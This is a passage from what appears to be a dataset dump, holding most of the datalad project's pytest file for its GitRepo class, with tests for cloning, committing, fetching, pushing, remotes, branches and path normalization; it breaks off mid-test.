toctree::\n :maxdepth: 2\n\n cli\n provenance_capture\n application_vs_library_mode\n file_url_handling\n result_records\n dataset_argument\n log_levels\n drop\n python_imports\n miscpatterns\n exception_handling\n credentials\n url_substitution\n threaded_runner\n batched_command\n standard_parameters\n pos_vs_kw_parameters\n docstrings\n progress_reporting\n github_actions\n testing\n user_messaging\n" }, { "alpha_fraction": 0.6141617894172668, "alphanum_fraction": 0.6216881275177002, "avg_line_length": 33.44987487792969, "blob_id": "c1642bf5ca28589861edac6595d09805666cffb9", "content_id": "79227d08aabb61c8dcad64647cb3686384945538", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 55671, "license_type": "permissive", "max_line_length": 109, "num_lines": 1616, "path": "/datalad/support/tests/test_gitrepo.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test implementation of class GitRepo\n\n\"\"\"\n\nimport logging\nimport os\nimport os.path as op\nimport sys\n\nimport pytest\n\nfrom datalad import get_encoding_info\nfrom datalad.cmd import (\n StdOutCapture,\n StdOutErrCapture,\n WitlessRunner,\n)\nfrom datalad.support.exceptions import (\n CommandError,\n FileNotInRepositoryError,\n InvalidGitRepositoryError,\n NoSuchPathError,\n PathKnownToRepositoryError,\n)\nfrom datalad.support.external_versions import external_versions\nfrom datalad.support.gitrepo import (\n GitRepo,\n _normalize_path,\n normalize_paths,\n to_options,\n)\nfrom datalad.support.sshconnector import get_connection_hash\nfrom datalad.tests.utils_pytest import (\n DEFAULT_BRANCH,\n DEFAULT_REMOTE,\n SkipTest,\n assert_cwd_unchanged,\n assert_equal,\n assert_false,\n assert_in,\n assert_in_results,\n assert_is_instance,\n assert_not_equal,\n assert_not_in,\n assert_raises,\n assert_repo_status,\n assert_true,\n create_tree,\n eq_,\n get_most_obscure_supported_name,\n integration,\n neq_,\n ok_,\n skip_if_no_network,\n skip_if_on_windows,\n skip_nomultiplex_ssh,\n slow,\n swallow_logs,\n with_tempfile,\n with_tree,\n xfail_buggy_annex_info,\n)\nfrom datalad.utils import (\n Path,\n chpwd,\n getpwd,\n on_windows,\n rmtree,\n)\n\n\n@with_tempfile(mkdir=True)\ndef test_GitRepo_invalid_path(path=None):\n with chpwd(path):\n assert_raises(ValueError, GitRepo, path=\"git://some/url\", create=True)\n ok_(not op.exists(op.join(path, \"git:\")))\n assert_raises(ValueError, GitRepo, path=\"file://some_location/path/at/location\", create=True)\n ok_(not op.exists(op.join(path, \"file:\")))\n\n\n@assert_cwd_unchanged\n@with_tempfile\n@with_tempfile\ndef test_GitRepo_instance_from_clone(src=None, dst=None):\n origin = GitRepo(src, create=True)\n gr = GitRepo.clone(src, dst)\n assert_is_instance(gr, GitRepo, \"GitRepo was not created.\")\n ok_(op.exists(op.join(dst, '.git')))\n\n # do it again should raise ValueError since git will notice there's\n # already a git-repo at that path and therefore can't clone to `dst`\n # Note: Since GitRepo is now a WeakSingletonRepo, this is prevented from\n # happening atm. 
Disabling for now:\n# raise SkipTest(\"Disabled for RF: WeakSingletonRepo\")\n with swallow_logs() as logs:\n assert_raises(ValueError, GitRepo.clone, src, dst)\n\n\n@assert_cwd_unchanged\n@with_tempfile\ndef test_GitRepo_instance_from_existing(path=None):\n GitRepo(path, create=True)\n\n gr = GitRepo(path)\n assert_is_instance(gr, GitRepo, \"GitRepo was not created.\")\n ok_(op.exists(op.join(path, '.git')))\n\n\n@assert_cwd_unchanged\n@with_tempfile\n@with_tempfile\ndef test_GitRepo_instance_from_not_existing(path=None, path2=None):\n # 1. create=False and path doesn't exist:\n assert_raises(NoSuchPathError, GitRepo, path, create=False)\n assert_false(op.exists(path))\n\n # 2. create=False, path exists, but no git repo:\n os.mkdir(path)\n ok_(op.exists(path))\n assert_raises(InvalidGitRepositoryError, GitRepo, path, create=False)\n assert_false(op.exists(op.join(path, '.git')))\n\n # 3. create=True, path doesn't exist:\n gr = GitRepo(path2, create=True)\n assert_is_instance(gr, GitRepo, \"GitRepo was not created.\")\n ok_(op.exists(op.join(path2, '.git')))\n assert_repo_status(path2, annex=False)\n\n # 4. create=True, path exists, but no git repo:\n gr = GitRepo(path, create=True)\n assert_is_instance(gr, GitRepo, \"GitRepo was not created.\")\n ok_(op.exists(op.join(path, '.git')))\n assert_repo_status(path, annex=False)\n\n\n@with_tempfile\ndef test_GitRepo_init_options(path=None):\n # passing an option, not explicitly defined in GitRepo class:\n gr = GitRepo(path, create=True, bare=True)\n ok_(gr.config.getbool(section=\"core\", option=\"bare\"))\n\n\n@with_tempfile\n@with_tempfile(mkdir=True)\n@with_tree(tree={'somefile': 'content', 'config': 'not a git config'})\n@with_tree(tree={'afile': 'other',\n '.git': {}})\n@with_tempfile\n@with_tempfile\ndef test_GitRepo_bare(path=None, empty_dir=None, non_empty_dir=None, empty_dot_git=None, non_bare=None,\n clone_path=None):\n\n import gc\n\n # create a bare repo:\n gr = GitRepo(path, create=True, bare=True)\n assert_equal(gr.dot_git, gr.pathobj)\n assert_true(gr.bare)\n assert_true(gr.config.getbool(\"core\", \"bare\"))\n assert_false((gr.pathobj / '.git').exists())\n assert_false(gr.call_git_success(['status'], expect_stderr=True))\n\n # kill the object and try to get a new instance on an existing bare repo:\n del gr\n gc.collect()\n\n gr = GitRepo(path, create=False)\n assert_equal(gr.dot_git, gr.pathobj)\n assert_true(gr.bare)\n assert_true(gr.config.getbool(\"core\", \"bare\"))\n assert_false((gr.pathobj / '.git').exists())\n assert_false(gr.call_git_success(['status'], expect_stderr=True))\n\n # an empty dir is not a bare repo:\n assert_raises(InvalidGitRepositoryError, GitRepo, empty_dir,\n create=False)\n\n # an arbitrary dir is not a bare repo:\n assert_raises(InvalidGitRepositoryError, GitRepo, non_empty_dir,\n create=False)\n\n # nor is a path with an empty .git:\n assert_raises(InvalidGitRepositoryError, GitRepo, empty_dot_git,\n create=False)\n\n # a regular repo is not bare\n non_bare_repo = GitRepo(non_bare, create=True)\n assert_false(non_bare_repo.bare)\n\n # we can have a bare clone\n clone = GitRepo.clone(non_bare, clone_path, clone_options={'bare': True})\n assert_true(clone.bare)\n\n@with_tree(\n tree={\n 'subds': {\n 'file_name': ''\n }\n }\n)\ndef test_init_fail_under_known_subdir(path=None):\n repo = GitRepo(path, create=True)\n repo.add(op.join('subds', 'file_name'))\n # Should fail even if we do not commit but only add to index:\n with assert_raises(PathKnownToRepositoryError) as cme:\n GitRepo(op.join(path, 
'subds'), create=True)\n assert_in(\"file_name\", str(cme.value)) # we provide a list of offenders\n # and after we commit - the same story\n repo.commit(\"added file\")\n with assert_raises(PathKnownToRepositoryError) as cme:\n GitRepo(op.join(path, 'subds'), create=True)\n\n # But it would succeed if we disable the checks\n GitRepo(op.join(path, 'subds'), create=True, create_sanity_checks=False)\n\n\n@with_tempfile\n@with_tempfile\ndef test_GitRepo_equals(path1=None, path2=None):\n\n repo1 = GitRepo(path1)\n repo2 = GitRepo(path1)\n ok_(repo1 == repo2)\n eq_(repo1, repo2)\n repo2 = GitRepo(path2)\n neq_(repo1, repo2)\n ok_(repo1 != repo2)\n\n\n@assert_cwd_unchanged\n@with_tempfile\n@with_tempfile\ndef test_GitRepo_add(src=None, path=None):\n\n gr = GitRepo(path)\n filename = get_most_obscure_supported_name()\n with open(op.join(path, filename), 'w') as f:\n f.write(\"File to add to git\")\n added = gr.add(filename)\n\n eq_(added, {'success': True, 'file': filename})\n assert_in(filename, gr.get_indexed_files(),\n \"%s not successfully added to %s\" % (filename, path))\n # uncommitted:\n ok_(gr.dirty)\n\n filename = \"another.txt\"\n with open(op.join(path, filename), 'w') as f:\n f.write(\"Another file to add to git\")\n\n # include committing:\n added2 = gr.add(filename)\n gr.commit(msg=\"Add two files.\")\n eq_(added2, {'success': True, 'file': filename})\n\n assert_in(filename, gr.get_indexed_files(),\n \"%s not successfully added to %s\" % (filename, path))\n assert_repo_status(path)\n\n\n@assert_cwd_unchanged\n@with_tree(tree={\n 'd': {'f1': 'content1',\n 'f2': 'content2'},\n 'file': 'content3',\n 'd2': {'f1': 'content1',\n 'f2': 'content2'},\n 'file2': 'content3'\n\n })\ndef test_GitRepo_remove(path=None):\n\n gr = GitRepo(path, create=True)\n gr.add('*')\n gr.commit(\"committing all the files\")\n\n eq_(gr.remove('file'), ['file'])\n eq_(set(gr.remove('d', r=True, f=True)), {'d/f1', 'd/f2'})\n\n eq_(set(gr.remove('*', r=True, f=True)), {'file2', 'd2/f1', 'd2/f2'})\n\n\n@assert_cwd_unchanged\n@with_tempfile\ndef test_GitRepo_commit(path=None):\n\n gr = GitRepo(path)\n filename = get_most_obscure_supported_name()\n with open(op.join(path, filename), 'w') as f:\n f.write(\"File to add to git\")\n\n gr.add(filename)\n gr.commit(\"Testing GitRepo.commit().\")\n assert_repo_status(gr)\n eq_(\"Testing GitRepo.commit().\",\n gr.format_commit(\"%B\").strip())\n\n with open(op.join(path, filename), 'w') as f:\n f.write(\"changed content\")\n\n gr.add(filename)\n gr.commit(\"commit with options\", options=to_options(dry_run=True))\n # wasn't actually committed:\n ok_(gr.dirty)\n\n # commit with empty message:\n gr.commit()\n assert_repo_status(gr)\n assert_equal(gr.format_commit(\"%B\").strip(), \"[DATALAD] Recorded changes\")\n\n # amend commit:\n assert_equal(len(list(gr.get_branch_commits_())), 2)\n last_sha = gr.get_hexsha()\n with open(op.join(path, filename), 'w') as f:\n f.write(\"changed again\")\n gr.add(filename)\n gr.commit(\"amend message\", options=to_options(amend=True))\n assert_repo_status(gr)\n assert_equal(gr.format_commit(\"%B\").strip(), \"amend message\")\n assert_not_equal(last_sha, gr.get_hexsha())\n assert_equal(len(list(gr.get_branch_commits_())), 2)\n # amend w/o message maintains previous one:\n gr.commit(options=to_options(amend=True))\n assert_repo_status(gr)\n assert_equal(len(list(gr.get_branch_commits_())), 2)\n assert_equal(gr.format_commit(\"%B\").strip(), \"amend message\")\n\n # nothing to commit doesn't raise by default:\n gr.commit()\n # but does with 
careless=False:\n assert_raises(CommandError, gr.commit, careless=False)\n\n # committing untracked file raises:\n with open(op.join(path, \"untracked\"), \"w\") as f:\n f.write(\"some\")\n assert_raises(FileNotInRepositoryError, gr.commit, files=\"untracked\")\n # not existing file as well:\n assert_raises(FileNotInRepositoryError, gr.commit, files=\"not-existing\")\n\n\n@with_tempfile\ndef test_GitRepo_get_indexed_files(path=None):\n\n gr = GitRepo(path)\n for filename in ('some1.txt', 'some2.dat'):\n with open(op.join(path, filename), 'w') as f:\n f.write(filename)\n gr.add(filename)\n gr.commit('Some files')\n\n idx_list = gr.get_indexed_files()\n\n runner = WitlessRunner(cwd=path)\n out = runner.run(['git', 'ls-files'], protocol=StdOutCapture)\n out_list = list(filter(bool, out['stdout'].split('\\n')))\n\n for item in idx_list:\n assert_in(item, out_list, \"%s not found in output of git ls-files in %s\" % (item, path))\n for item in out_list:\n assert_in(item, idx_list, \"%s not found in output of get_indexed_files in %s\" % (item, path))\n\n\n@with_tree([\n ('empty', ''),\n ('d1', (\n ('empty', ''),\n ('d2',\n (('empty', ''),\n )),\n )),\n ])\n@assert_cwd_unchanged(ok_to_chdir=True)\ndef test_normalize_path(git_path=None):\n\n gr = GitRepo(git_path)\n\n # cwd is currently outside the repo, so any relative path\n # should be interpreted as relative to `annex_path`\n assert_raises(FileNotInRepositoryError, _normalize_path, gr.path, getpwd())\n\n result = _normalize_path(gr.path, \"testfile\")\n eq_(result, \"testfile\", \"_normalize_path() returned %s\" % result)\n\n # result = _normalize_path(gr.path, op.join('.', 'testfile'))\n # eq_(result, \"testfile\", \"_normalize_path() returned %s\" % result)\n #\n # result = _normalize_path(gr.path, op.join('testdir', '..', 'testfile'))\n # eq_(result, \"testfile\", \"_normalize_path() returned %s\" % result)\n # Note: By now, normpath within normalize_paths() is disabled, therefore\n # disable these tests.\n\n result = _normalize_path(gr.path, op.join('testdir', 'testfile'))\n eq_(result, op.join(\"testdir\", \"testfile\"), \"_normalize_path() returned %s\" % result)\n\n result = _normalize_path(gr.path, op.join(git_path, \"testfile\"))\n eq_(result, \"testfile\", \"_normalize_path() returned %s\" % result)\n\n # now we are inside, so\n # OLD PHILOSOPHY: relative paths are relative to cwd and have\n # to be converted to be relative to annex_path\n # NEW PHILOSOPHY: still relative to repo! unless starts with . (curdir) or .. 
(pardir)\n with chpwd(op.join(git_path, 'd1', 'd2')):\n\n result = _normalize_path(gr.path, \"testfile\")\n eq_(result, 'testfile', \"_normalize_path() returned %s\" % result)\n\n # if not joined as directory name but just a prefix to the filename, should\n # behave correctly\n for d in (op.curdir, op.pardir):\n result = _normalize_path(gr.path, d + \"testfile\")\n eq_(result, d + 'testfile', \"_normalize_path() returned %s\" % result)\n\n result = _normalize_path(gr.path, op.join(op.curdir, \"testfile\"))\n eq_(result, op.join('d1', 'd2', 'testfile'), \"_normalize_path() returned %s\" % result)\n\n result = _normalize_path(gr.path, op.join(op.pardir, 'testfile'))\n eq_(result, op.join('d1', 'testfile'), \"_normalize_path() returned %s\" % result)\n\n assert_raises(FileNotInRepositoryError, _normalize_path, gr.path, op.join(git_path, '..', 'outside'))\n\n result = _normalize_path(gr.path, op.join(git_path, 'd1', 'testfile'))\n eq_(result, op.join('d1', 'testfile'), \"_normalize_path() returned %s\" % result)\n\n\ndef test_GitRepo_files_decorator():\n\n class testclass(object):\n def __init__(self):\n self.path = op.join('some', 'where')\n\n # TODO\n # yoh: logic is alien to me below why to have two since both look identical!\n @normalize_paths\n def decorated_many(self, files):\n return files\n\n @normalize_paths\n def decorated_one(self, file_):\n return file_\n\n test_instance = testclass()\n\n # When a single file passed -- single path returned\n obscure_filename = get_most_obscure_supported_name()\n file_to_test = op.join(test_instance.path, 'deep', obscure_filename)\n # file doesn't exist\n eq_(test_instance.decorated_one(file_to_test),\n _normalize_path(test_instance.path, file_to_test))\n eq_(test_instance.decorated_one(file_to_test),\n _normalize_path(test_instance.path, file_to_test))\n\n file_to_test = obscure_filename\n eq_(test_instance.decorated_many(file_to_test),\n _normalize_path(test_instance.path, file_to_test))\n eq_(test_instance.decorated_one(file_to_test),\n _normalize_path(test_instance.path, file_to_test))\n\n\n file_to_test = op.join(obscure_filename, 'beyond', 'obscure')\n eq_(test_instance.decorated_many(file_to_test),\n _normalize_path(test_instance.path, file_to_test))\n\n file_to_test = op.join(getpwd(), 'somewhere', 'else', obscure_filename)\n assert_raises(FileNotInRepositoryError, test_instance.decorated_many,\n file_to_test)\n\n # If a list passed -- list returned\n files_to_test = ['now', op.join('a list', 'of'), 'paths']\n expect = []\n for item in files_to_test:\n expect.append(_normalize_path(test_instance.path, item))\n eq_(test_instance.decorated_many(files_to_test), expect)\n\n eq_(test_instance.decorated_many(''), [])\n\n assert_raises(ValueError, test_instance.decorated_many, 1)\n assert_raises(ValueError, test_instance.decorated_one, 1)\n\n\n@skip_if_no_network\n@with_tempfile\ndef test_GitRepo_remote_add(path=None):\n gr = GitRepo(path)\n gr.add_remote('github', 'https://github.com/datalad/testrepo--basic--r1')\n out = gr.get_remotes()\n assert_in('github', out)\n eq_(len(out), 1)\n eq_('https://github.com/datalad/testrepo--basic--r1', gr.config['remote.github.url'])\n\n\n@with_tempfile\ndef test_GitRepo_remote_remove(path=None):\n\n gr = GitRepo(path)\n gr.add_remote('github', 'https://github.com/datalad/testrepo--basic--r1')\n out = gr.get_remotes()\n eq_(len(out), 1)\n gr.remove_remote('github')\n out = gr.get_remotes()\n eq_(len(out), 0)\n\n\n@with_tempfile\ndef test_GitRepo_get_remote_url(path=None):\n\n gr = GitRepo(path)\n 
gr.add_remote('github', 'https://github.com/datalad/testrepo--basic--r1')\n eq_(gr.get_remote_url('github'),\n 'https://github.com/datalad/testrepo--basic--r1')\n\n\n@with_tempfile\n@with_tempfile\ndef test_GitRepo_fetch(orig_path=None, clone_path=None):\n\n origin = GitRepo(orig_path)\n with open(op.join(orig_path, 'some.txt'), 'w') as f:\n f.write(\"New text file.\")\n origin.add('some.txt')\n origin.commit(\"new file added.\")\n\n clone = GitRepo.clone(orig_path, clone_path)\n filename = get_most_obscure_supported_name()\n\n origin.checkout(\"new_branch\", ['-b'])\n with open(op.join(orig_path, filename), 'w') as f:\n f.write(\"New file.\")\n origin.add(filename)\n origin.commit(\"new file added.\")\n\n fetched = clone.fetch(remote=DEFAULT_REMOTE)\n # test FetchInfo list returned by fetch\n eq_([DEFAULT_REMOTE + '/' + clone.get_active_branch(),\n DEFAULT_REMOTE + '/new_branch'],\n [commit['ref'] for commit in fetched])\n\n assert_repo_status(clone.path, annex=False)\n assert_in(DEFAULT_REMOTE + \"/new_branch\", clone.get_remote_branches())\n assert_in(filename, clone.get_files(DEFAULT_REMOTE + \"/new_branch\"))\n assert_false(op.exists(op.join(clone_path, filename))) # not checked out\n\n # create a remote without an URL:\n origin.add_remote('not-available', 'git://example.com/not/existing')\n origin.config.unset('remote.not-available.url', scope='local')\n\n # fetch without provided URL\n assert_raises(CommandError, origin.fetch, 'not-available')\n\n\ndef _path2localsshurl(path):\n \"\"\"Helper to build valid localhost SSH urls on Windows too\"\"\"\n path = op.abspath(path)\n p = Path(path)\n if p.drive:\n path = '/'.join(('/{}'.format(p.drive[0]),) + p.parts[1:])\n url = \"ssh://datalad-test{}\".format(path)\n return url\n\n\n@skip_nomultiplex_ssh\n@with_tempfile\n@with_tempfile\ndef test_GitRepo_ssh_fetch(remote_path=None, repo_path=None):\n from datalad import ssh_manager\n\n remote_repo = GitRepo(remote_path)\n with open(op.join(remote_path, 'some.txt'), 'w') as f:\n f.write(\"New text file.\")\n remote_repo.add('some.txt')\n remote_repo.commit(\"new file added.\")\n\n url = _path2localsshurl(remote_path)\n socket_path = op.join(str(ssh_manager.socket_dir),\n get_connection_hash('datalad-test'))\n repo = GitRepo(repo_path, create=True)\n repo.add_remote(\"ssh-remote\", url)\n\n # we don't know any branches of the remote:\n eq_([], repo.get_remote_branches())\n\n fetched = repo.fetch(remote=\"ssh-remote\")\n assert_in('ssh-remote/' + DEFAULT_BRANCH,\n [commit['ref'] for commit in fetched])\n assert_repo_status(repo)\n\n # the connection is known to the SSH manager, since fetch() requested it:\n assert_in(socket_path, list(map(str, ssh_manager._connections)))\n # and socket was created:\n ok_(op.exists(socket_path))\n\n # we actually fetched it:\n assert_in('ssh-remote/' + DEFAULT_BRANCH,\n repo.get_remote_branches())\n\n\n@skip_nomultiplex_ssh\n@with_tempfile\n@with_tempfile\ndef test_GitRepo_ssh_push(repo_path=None, remote_path=None):\n from datalad import ssh_manager\n\n remote_repo = GitRepo(remote_path, create=True)\n url = _path2localsshurl(remote_path)\n socket_path = op.join(str(ssh_manager.socket_dir),\n get_connection_hash('datalad-test'))\n repo = GitRepo(repo_path, create=True)\n repo.add_remote(\"ssh-remote\", url)\n\n # modify local repo:\n repo.checkout(\"ssh-test\", ['-b'])\n with open(op.join(repo.path, \"ssh_testfile.dat\"), \"w\") as f:\n f.write(\"whatever\")\n repo.add(\"ssh_testfile.dat\")\n repo.commit(\"ssh_testfile.dat added.\")\n\n # file is not known to the 
remote yet:\n assert_not_in(\"ssh_testfile.dat\", remote_repo.get_indexed_files())\n\n # push changes:\n pushed = list(repo.push(remote=\"ssh-remote\", refspec=\"ssh-test\"))\n # test PushInfo\n assert_in(\"refs/heads/ssh-test\", [p['from_ref'] for p in pushed])\n assert_in(\"refs/heads/ssh-test\", [p['to_ref'] for p in pushed])\n\n # the connection is known to the SSH manager, since fetch() requested it:\n assert_in(socket_path, list(map(str, ssh_manager._connections)))\n # and socket was created:\n ok_(op.exists(socket_path))\n\n # remote now knows the changes:\n assert_in(\"ssh-test\", remote_repo.get_branches())\n assert_in(\"ssh_testfile.dat\", remote_repo.get_files(\"ssh-test\"))\n\n # amend to make it require \"--force\":\n repo.commit(\"amended\", options=['--amend'])\n # push without --force should yield an error:\n res = repo.push(remote=\"ssh-remote\", refspec=\"ssh-test\")\n assert_in_results(\n res,\n from_ref='refs/heads/ssh-test',\n to_ref='refs/heads/ssh-test',\n operations=['rejected', 'error'],\n note='[rejected] (non-fast-forward)',\n remote='ssh-remote',\n )\n # now push using force:\n repo.push(remote=\"ssh-remote\", refspec=\"ssh-test\", force=True)\n # correct commit message in remote:\n assert_in(\"amended\",\n remote_repo.format_commit(\n '%s',\n list(remote_repo.get_branch_commits_('ssh-test'))[-1]\n ))\n\n\n@with_tempfile\n@with_tempfile\ndef test_GitRepo_push_n_checkout(orig_path=None, clone_path=None):\n\n origin = GitRepo(orig_path)\n clone = GitRepo.clone(orig_path, clone_path)\n filename = get_most_obscure_supported_name()\n\n with open(op.join(clone_path, filename), 'w') as f:\n f.write(\"New file.\")\n clone.add(filename)\n clone.commit(\"new file added.\")\n # TODO: need checkout first:\n clone.push(DEFAULT_REMOTE, '+{}:new-branch'.format(DEFAULT_BRANCH))\n origin.checkout('new-branch')\n ok_(op.exists(op.join(orig_path, filename)))\n\n\n@with_tempfile\n@with_tempfile\n@with_tempfile\ndef test_GitRepo_remote_update(path1=None, path2=None, path3=None):\n\n git1 = GitRepo(path1)\n git2 = GitRepo(path2)\n git3 = GitRepo(path3)\n\n git1.add_remote('git2', path2)\n git1.add_remote('git3', path3)\n\n # Setting up remote 'git2'\n with open(op.join(path2, 'masterfile'), 'w') as f:\n f.write(\"git2 in master\")\n git2.add('masterfile')\n git2.commit(\"Add something to master.\")\n git2.checkout('branch2', ['-b'])\n with open(op.join(path2, 'branch2file'), 'w') as f:\n f.write(\"git2 in branch2\")\n git2.add('branch2file')\n git2.commit(\"Add something to branch2.\")\n\n # Setting up remote 'git3'\n with open(op.join(path3, 'masterfile'), 'w') as f:\n f.write(\"git3 in master\")\n git3.add('masterfile')\n git3.commit(\"Add something to master.\")\n git3.checkout('branch3', ['-b'])\n with open(op.join(path3, 'branch3file'), 'w') as f:\n f.write(\"git3 in branch3\")\n git3.add('branch3file')\n git3.commit(\"Add something to branch3.\")\n\n git1.update_remote()\n\n # checkouts are 'tests' themselves, since they'll raise CommandError\n # if something went wrong\n git1.checkout('branch2')\n git1.checkout('branch3')\n\n branches1 = git1.get_branches()\n eq_({'branch2', 'branch3'}, set(branches1))\n\n\n@with_tempfile\n@with_tempfile\ndef test_GitRepo_get_files(src_path=None, path=None):\n src = GitRepo(src_path)\n for filename in ('some1.txt', 'some2.dat'):\n with open(op.join(src_path, filename), 'w') as f:\n f.write(filename)\n src.add(filename)\n src.commit('Some files')\n\n gr = GitRepo.clone(src.path, path)\n # get the expected files via os for comparison:\n os_files 
= set()\n for (dirpath, dirnames, filenames) in os.walk(path):\n rel_dir = os.path.relpath(dirpath, start=path)\n if rel_dir.startswith(\".git\"):\n continue\n for file_ in filenames:\n file_path = os.path.normpath(op.join(rel_dir, file_))\n os_files.add(file_path)\n\n # get the files via GitRepo:\n local_files = set(gr.get_files())\n remote_files = set(gr.get_files(\n branch=f\"{DEFAULT_REMOTE}/{DEFAULT_BRANCH}\"))\n\n eq_(local_files, set(gr.get_indexed_files()))\n eq_(local_files, remote_files)\n eq_(local_files, os_files)\n\n # create a different branch:\n gr.checkout('new_branch', ['-b'])\n filename = 'another_file.dat'\n with open(op.join(path, filename), 'w') as f:\n f.write(\"something\")\n gr.add(filename)\n gr.commit(\"Added.\")\n\n # now get the files again:\n local_files = set(gr.get_files())\n eq_(local_files, os_files.union({filename}))\n # retrieve remote branch again, which should not have changed:\n remote_files = set(gr.get_files(\n branch=f\"{DEFAULT_REMOTE}/{DEFAULT_BRANCH}\"))\n eq_(remote_files, os_files)\n eq_(set([filename]), local_files.difference(remote_files))\n\n # switch back and query non-active branch:\n gr.checkout(DEFAULT_BRANCH)\n local_files = set(gr.get_files())\n branch_files = set(gr.get_files(branch=\"new_branch\"))\n eq_(set([filename]), branch_files.difference(local_files))\n\n\n@with_tempfile\n@with_tempfile(mkdir=True)\n@with_tempfile\ndef test_GitRepo_get_toppath(repo=None, tempdir=None, repo2=None):\n GitRepo(repo, create=True)\n reporeal = str(Path(repo).resolve())\n eq_(GitRepo.get_toppath(repo, follow_up=False), reporeal)\n eq_(GitRepo.get_toppath(repo), repo)\n # Generate some nested directory\n GitRepo(repo2, create=True)\n repo2real = str(Path(repo2).resolve())\n nested = op.join(repo2, \"d1\", \"d2\")\n os.makedirs(nested)\n eq_(GitRepo.get_toppath(nested, follow_up=False), repo2real)\n eq_(GitRepo.get_toppath(nested), repo2)\n # and if not under git, should return None\n eq_(GitRepo.get_toppath(tempdir), None)\n\n\n@with_tempfile(mkdir=True)\ndef test_GitRepo_dirty(path=None):\n\n repo = GitRepo(path, create=True)\n ok_(not repo.dirty)\n\n # untracked file\n with open(op.join(path, 'file1.txt'), 'w') as f:\n f.write('whatever')\n ok_(repo.dirty)\n # staged file\n repo.add('file1.txt')\n ok_(repo.dirty)\n # clean again\n repo.commit(\"file1.txt added\")\n ok_(not repo.dirty)\n # modify to be the same\n with open(op.join(path, 'file1.txt'), 'w') as f:\n f.write('whatever')\n ok_(not repo.dirty)\n # modified file\n with open(op.join(path, 'file1.txt'), 'w') as f:\n f.write('something else')\n ok_(repo.dirty)\n # clean again\n repo.add('file1.txt')\n repo.commit(\"file1.txt modified\")\n ok_(not repo.dirty)\n\n # An empty directory doesn't count as dirty.\n os.mkdir(op.join(path, \"empty\"))\n ok_(not repo.dirty)\n # Neither does an empty directory with an otherwise empty directory.\n os.mkdir(op.join(path, \"empty\", \"empty-again\"))\n ok_(not repo.dirty)\n\n subm = GitRepo(repo.pathobj / \"subm\", create=True)\n (subm.pathobj / \"subfile\").write_text(u\"\")\n subm.save()\n repo.save()\n ok_(not repo.dirty)\n (subm.pathobj / \"subfile\").write_text(u\"changed\")\n ok_(repo.dirty)\n\n # User configuration doesn't affect .dirty's answer.\n repo.config.set(\"diff.ignoreSubmodules\", \"all\", scope=\"local\")\n ok_(repo.dirty)\n # GitRepo.commit currently can't handle this setting, so remove it for the\n # save() calls below.\n repo.config.unset(\"diff.ignoreSubmodules\", scope=\"local\")\n subm.save()\n repo.save()\n ok_(not repo.dirty)\n\n 
repo.config.set(\"status.showUntrackedFiles\", \"no\", scope=\"local\")\n create_tree(repo.path, {\"untracked_dir\": {\"a\": \"a\"}})\n ok_(repo.dirty)\n\n\n@with_tempfile(mkdir=True)\ndef test_GitRepo_get_merge_base(src=None):\n repo = GitRepo(src, create=True)\n with open(op.join(src, 'file.txt'), 'w') as f:\n f.write('load')\n repo.add('*')\n repo.commit('committing')\n\n assert_raises(ValueError, repo.get_merge_base, [])\n branch1 = repo.get_active_branch()\n branch1_hexsha = repo.get_hexsha()\n eq_(len(branch1_hexsha), 40)\n eq_(repo.get_merge_base(branch1), branch1_hexsha)\n\n # Let's create a detached branch\n branch2 = \"_detach_\"\n repo.checkout(branch2, options=[\"--orphan\"])\n # it will have all the files\n # Must not do: https://github.com/gitpython-developers/GitPython/issues/375\n # repo.git_add('.')\n repo.add('*')\n # NOTE: fun part is that we should have at least a different commit message\n # so it results in a different checksum ;)\n repo.commit(\"committing again\")\n assert(repo.get_indexed_files()) # we did commit\n assert(repo.get_merge_base(branch1) is None)\n assert(repo.get_merge_base([branch2, branch1]) is None)\n\n # Let's merge them up -- then merge base should match the master\n repo.merge(branch1, allow_unrelated=True)\n eq_(repo.get_merge_base(branch1), branch1_hexsha)\n\n # if points to some empty/non-existing branch - should also be None\n assert(repo.get_merge_base(['nonexistent', branch2]) is None)\n\n\n@with_tempfile(mkdir=True)\ndef test_GitRepo_git_get_branch_commits_(src=None):\n\n repo = GitRepo(src, create=True)\n with open(op.join(src, 'file.txt'), 'w') as f:\n f.write('load')\n repo.add('*')\n repo.commit('committing')\n # go in a branch with a name that matches the file to require\n # proper disambiguation\n repo.call_git(['checkout', '-b', 'file.txt'])\n\n commits_default = list(repo.get_branch_commits_())\n commits = list(repo.get_branch_commits_(DEFAULT_BRANCH))\n eq_(commits, commits_default)\n eq_(len(commits), 1)\n\n\n@with_tempfile\n@with_tempfile\ndef test_get_tracking_branch(o_path=None, c_path=None):\n src = GitRepo(o_path)\n for filename in ('some1.txt', 'some2.dat'):\n with open(op.join(o_path, filename), 'w') as f:\n f.write(filename)\n src.add(filename)\n src.commit('Some files')\n\n clone = GitRepo.clone(o_path, c_path)\n # Note, that the default branch might differ even if it is always 'master'.\n # For direct mode annex repositories it would then be \"annex/direct/master\"\n # for example. 
Therefore use whatever branch is checked out by default:\n master_branch = clone.get_active_branch()\n ok_(master_branch)\n\n eq_((DEFAULT_REMOTE, 'refs/heads/' + master_branch),\n clone.get_tracking_branch())\n\n clone.checkout('new_branch', ['-b'])\n\n eq_((None, None), clone.get_tracking_branch())\n\n eq_((DEFAULT_REMOTE, 'refs/heads/' + master_branch),\n clone.get_tracking_branch(master_branch))\n\n clone.checkout(master_branch, options=[\"--track\", \"-btopic\"])\n eq_(('.', 'refs/heads/' + master_branch),\n clone.get_tracking_branch())\n eq_((None, None),\n clone.get_tracking_branch(remote_only=True))\n\n\n@with_tempfile\ndef test_GitRepo_get_submodules(path=None):\n repo = GitRepo(path, create=True)\n\n s_abc = GitRepo(op.join(path, \"s_abc\"), create=True)\n s_abc.commit(msg=\"c s_abc\", options=[\"--allow-empty\"])\n repo.save(path=\"s_abc\")\n\n s_xyz = GitRepo(op.join(path, \"s_xyz\"), create=True)\n s_xyz.commit(msg=\"c s_xyz\", options=[\"--allow-empty\"])\n repo.save(path=\"s_xyz\")\n\n 